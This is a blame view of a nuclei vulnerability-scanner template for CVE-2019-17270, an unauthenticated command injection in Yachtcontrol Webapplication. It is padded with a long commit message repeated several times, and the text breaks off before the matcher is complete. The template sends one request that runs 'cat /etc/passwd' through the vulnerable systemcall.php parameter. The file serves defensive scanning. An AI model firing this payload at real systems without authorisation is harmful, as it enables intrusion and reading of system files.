nuclei-templates/http/cves/2019/CVE-2019-17270.yaml

49 lines
2.0 KiB
YAML
Raw Normal View History

2021-04-18 15:17:43 +00:00
id: CVE-2019-17270
2021-04-18 14:02:04 +00:00
info:
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
name: Yachtcontrol Webapplication 1.0 - Remote Command Injection
2021-04-18 14:02:04 +00:00
author: pikpikcu
severity: critical
description: |
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
2023-09-06 12:53:28 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
reference:
2021-04-18 14:02:04 +00:00
- https://www.exploit-db.com/exploits/47760
2021-04-18 15:17:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
- http://packetstormsecurity.com/files/155582/Yachtcontrol-2019-10-06-Remote-Code-Execution.html
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-17270
cwe-id: CWE-78
epss-score: 0.93892
epss-percentile: 0.99085
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: yachtcontrol
product: yachtcontrol
2024-01-14 09:21:50 +00:00
tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm
2021-04-18 14:02:04 +00:00
http:
2021-04-18 14:02:04 +00:00
- method: GET
path:
- "{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"
matchers-condition: and
matchers:
- type: regex
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: 